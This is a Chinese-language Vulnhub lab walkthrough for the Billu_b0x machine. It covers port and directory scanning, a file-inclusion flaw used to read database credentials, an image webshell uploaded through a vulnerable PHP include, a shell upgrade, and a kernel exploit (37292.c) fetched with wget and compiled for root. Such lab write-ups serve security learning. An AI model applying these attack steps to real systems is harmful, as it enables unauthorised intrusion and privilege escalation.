Vulnhub靶机:Billu_b0x

一、介绍

运行环境:Virtualbox

攻击机:kali(192.168.56.101)

靶机:Billu_b0x(192.168.56.107)

目标:获取靶机root权限和flag

靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip

二、信息收集

使用nmap主机发现靶机ip:192.168.56.107

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80

nmap -A 192.168.56.107 -p 1-65535

在这里插入图片描述

打开网站发现是一个登录页面,查看源码未发现隐藏信息

在这里插入图片描述

直接使用sqlmap探测是否具有sql注入漏洞,没有发现sql注入漏洞

sqlmap -u http://192.168.56.107/ --dbs --forms

使用gobuster和dirsearch工具进行目录爆破,浏览器访问这些爆破出来的目录访问

gobuster dir -u http://192.168.56.107/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtdirsearch -u http://192.168.56.107/                           

在这里插入图片描述
在这里插入图片描述

访问/in.php,发现网站根目录

在这里插入图片描述

访问/add.php文件,发现上传图片功能,尝试上传文件,发现均上传失败

在这里插入图片描述

访问/test.php文件,发现显示“file”参数为空,可以猜测这里存在文件包含漏洞

在这里插入图片描述

访问/phpmy/目录,发现是phpmyadmin登录页面

在这里插入图片描述

三、漏洞利用

文件包含漏洞利用,使用GET传递参数失败,使用POST传参成功

在这里插入图片描述

包含网站文件,看看有没有什么敏感信息,发现包含c.php时,得到数据库用户名密码:billu:b0x_billu

mysqli_connect(host,username,password,dbname,port,socket);

在这里插入图片描述

使用数据库用户名密码登录phpmyadmin

在这里插入图片描述

发现网站的用户名密码:biLLu:hEx_it

在这里插入图片描述

登录网站发现添加用户功能点存在文件上传的地方

在这里插入图片描述

上传php文件,上传失败,只能上传图片文件

构造图片马,将图片马上传,上传成功

copy 1.jpg/b+shell.php/a shell.jpg

在这里插入图片描述
在这里插入图片描述

使用test.php文件包含漏洞包含图片马,包含失败,会直接读取该图片的内容

在这里插入图片描述

查看test.php的源码,发现test.php是使用readfile函数读取文件内容,并不能包含文件

在这里插入图片描述

查看网站其它文件代码,看看有没有利用的地方,发现存在continue参数的时候,load参数可以进行文件包含

if(isset($_POST['continue']))
{$dir=getcwd();$choice=str_replace('./','',$_POST['load']);if($choice==='add'){include($dir.'/'.$choice.'.php');die();}if($choice==='show'){include($dir.'/'.$choice.'.php');die();}else{include($dir.'/'.$_POST['load']);}
}

在这里插入图片描述

构造代码,包含之前上传的图片马,反弹shell

在这里插入图片描述
在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

使用cat /etc/issue命令查看靶机的发行版本信息,使用uname -a命令查看靶机内核版本信息

在这里插入图片描述

使用searchsploit搜索Ubuntu 12.04 的历史漏洞,我们选择linux/local/37292.c

searchsploit Ubuntu 12.04 

在这里插入图片描述

将该exp下载下来,使用web服务器将exp上传到靶机

searchsploit -m linux/local/37292.c  

在这里插入图片描述

wget http://192.168.56.101/37292.c

在这里插入图片描述

使用gcc编译,执行,获取root权限

gcc 37292.c -o 37292
./37292

在这里插入图片描述

未发现flag

参考链接:https://blog.csdn.net/qq_52576844/article/details/122405136

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/724049.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

智慧城市中的数据力量:大数据与AI的应用

目录 一、引言 二、大数据与AI技术的融合 三、大数据与AI在智慧城市中的应用 1、智慧交通 2、智慧环保 3、智慧公共安全 4、智慧公共服务 四、大数据与AI在智慧城市中的价值 1、提高城市管理的效率和水平 2、优化城市资源的配置和利用 3、提升市民的生活质量和幸福感…

【简单模拟】第十三届蓝桥杯省赛C++ B组《刷题统计》(c++)

1.题目描述 小明决定从下周一开始努力刷题准备蓝桥杯竞赛。 他计划周一至周五每天做 a 道题目,周六和周日每天做 b 道题目。 请你帮小明计算,按照计划他将在第几天实现做题数大于等于 n 题? 2.输入格式 输入一行包含三个整数 a,b 和 n。…

Vue+腾讯地图-实现关键词输入提示功能

不废话,上代码~~~ 效果图: 1、先去腾讯地图后台创建自己的应用获取到应用的 Key 腾讯地图后台地址:腾讯位置服务 - 立足生态,连接未来 创建应用的 Key 如下: 2、在项目中添加腾讯地图API的js插件,如…

CCF-A推荐会议 安全界顶会ACM CCS‘24 4月29日第二轮投稿!共建更安全的数字世界!

会议之眼 快讯 第31届ACM CCS (ACM Conference on Computer and Communications Security)即计算机和通信安全会议将于 2024 年 10月14日-18日在美国盐湖城举行!CCS是美国计算机协会(ACM)安全、审计与控制特别兴趣小组(SIGSAC)主办的一年一度的重要会议。是SIGSAC的…

Mint_21.3 drawing-area和goocanvas的FB笔记(三)

一、改变goocanvas线条自动画线时间间隔 通过系统SIGALRM信号触发,每秒画一条线对于慢温湿度等慢变信号可以应付,但对于快速信号1秒的间隔就太慢了。可以改变方式,通过另外的线程,完成要做的任务。 1. 线程的回调函数 myfunc 2…

Python读取influxDB数据库

1. influxDB连接 首先用InfluxDBStudio软件连接influxDB数据库来查看所有表: 2. 写sql语句来查询数据 然后和平时写sql查询语句一样,先创建连接client,然后调用其query函数来查询获取数据 self.client influxdb.InfluxDBClient(hostinflu…

抖店怎么做起来?2024新版操作逻辑,做项目要做一米宽万米深

我是王路飞。 不知不觉间,我已经在抖音电商这条赛道深耕走过了四年。 这四年里,我们有了自己的黑标品牌旗舰,有了自己的仓库配套周边,有了自己的模式体系人员,有了数不清的类目和产品操作经验。 收获着身后团队伙伴…

PXE网络启动实战(第二篇 使用WDS启动WIN10PE)

目录 一、PE光盘结构分析 二、WIM格式的部署 三、安装配置Windows部署服务 1.准备虚拟机 2.复制WinPE的ISO文件到服务器 3.将Win10PE的WIM释放出来 4.配置服务器,设置固定IP地址 5.安装DHCP、DNS服务

EdgeX Foundry - 连接 MQTT 设备

文章目录 一、概述1.安装说明2.MQTT 设备模拟器2.1.模拟器设计2.2.Spring Boot 程序源码2.2.1.MQTT2.2.2.JsonUtils2.2.3.Device 2.3.程序配置 二、连接 MQTT 设备1.docker-comepse2.设备配置文件3.启动 EdgeX Foundry4.访问 UI4.1. consul4.2. EdgeX Console 5.创建 MQTT 设备…

由数据范围反推算法复杂度以及算法内容

一般ACM或者笔试题的时间限制是1秒或2秒。 在这种情况下,C代码中的操作次数控制在 1 0 7 ∼ 1 0 8 10^7\sim10^8 107∼108为最佳。 下面给出在不同数据范围下,代码的时间复杂度和算法该如何选择: n ≤ 30 n\leq30 n≤30,指数级别…

2024年字节跳动+京东+美团面试总结,程序员经验分享

现在的IT行业竞争压力越来越大,尤其是Android开发行业。而很多Android程序员却每天都在重复CRUD,原地徘徊! 今年年初,你就想改变现状,于是在网上刷了大量面试题,强行记下之后,开始参加面试!但是…

微信小程序开发系列(七)·如何实现小程序页面的快速跳转、小程序样式·尺寸单位rpx以及全局样式和局部样式的区别

微信小程序开发_时光の尘的博客-CSDN博客 目录 1. 小程序样式和组件介绍 2. 如何实现页面的快速跳转 3. 小程序样式尺寸单位rpx 3.1 使用px 3.2 使用rpx 4. 全局样式和局部样式 4.1 全局样式 4.2 局部样式 1. 小程序样式和组件介绍 在开发 Web网站的时候&am…

C语言深入学习 --- 2.指针的进阶

文章目录 第二章指针的进阶1.字符指针2.指针数组3.数组指针3.1数组指针的定义3.2 &数组名与数组名的区别3.3 数组指针的使用 4.数组参数与指针参数4.1 一维数组的传参4.2 二维数组的传参4.3 一级指针传参4.4 二级指针传参 5.函数指针6.函数指针数组7.指向函数指针数组的指针…

15 实战:Kaggle房价预测 + 课程竞赛:加州2020年房价预测【李沐动手学深度学习课程笔记】

15 实战:Kaggle房价预测 课程竞赛:加州2020年房价预测【李沐动手学深度学习课程笔记】https://zhuanlan.zhihu.com/p/685343754 写在前面:这里格式很乱,代码直接去知乎copy 1 实战Kaggle比赛:预测房价 1.1 实现几个函…

【系统安全加固】Centos 设置禁用密码并打开密钥登录

文章目录 一,概述二,操作步骤1. 服务器端生成密钥2. 在服务器上安装公钥3.下载私钥到本地(重要,否则后面无法登录)4. 修改配置文件,禁用密码并打开密钥登录5. 重启sshd服务6. 配置xshell使用密钥登录 一&am…

线段树及例题动态求连续区间和 Java代码

线段树 作用 1、单点修改 2、区间查询 相比于树状数组,线段树代码更复杂但应用更广泛 例题 Acwing 1264. 动态求连续区间和 给定 n n n 个数组成的一个数列,规定有两种操作,一是修改某个元素,二是求子数列 [ a , b ] [a,b] […

leetcode 200 . 岛屿数量

链接 : . - 力扣(LeetCode) 广搜 : BFS 适合于解决两个点之间的最短路问题 ; 以起始点为中心一圈一圈的进行搜索 , 一旦遇到终点 , 记录之前走过的结点就是一条最短路 ; 代码模板 : int dir[4][2] {0, 1, 1,…

自动化测试基础——Pytest框架之YAML详解以及Parametrize数据驱动

文章目录 一、YAML详解1.YAML作用2.YAML语法结构3.YAML数据类型3.1.对象3.2.数组3.3.标量 4.YAML的引用5.YAML类型转换 二、YAML的读写与清空1.YAML的读2.YAML的写3.YAML的清空 三、pytest的parametrize简单数据驱动四、pytest的parametrize结合yaml实现数据驱动五、解决pytest…

FreeRTOS操作系统学习——空闲任务及其钩子函数

空闲任务 当 FreeRTOS 的调度器启动以后就会自动的创建一个空闲任务,这样就可以确保至少有一任务可以运行。但是这个空闲任务使用最低优先级,如果应用中有其他高优先级任务处于就绪态的话这个空闲任务就不会跟高优先级的任务抢占 CPU 资源。空闲任务还有…

FlinkSQL ChangeLog

01 Changelog相关优化规则 0101 运行upsert-kafka作业 登录sql-client,创建一个upsert-kafka的sql作业(注意,这里发送给kafka的消息必须带key,普通只有value的消息无法解析,这里的key即是主键的值) CREA…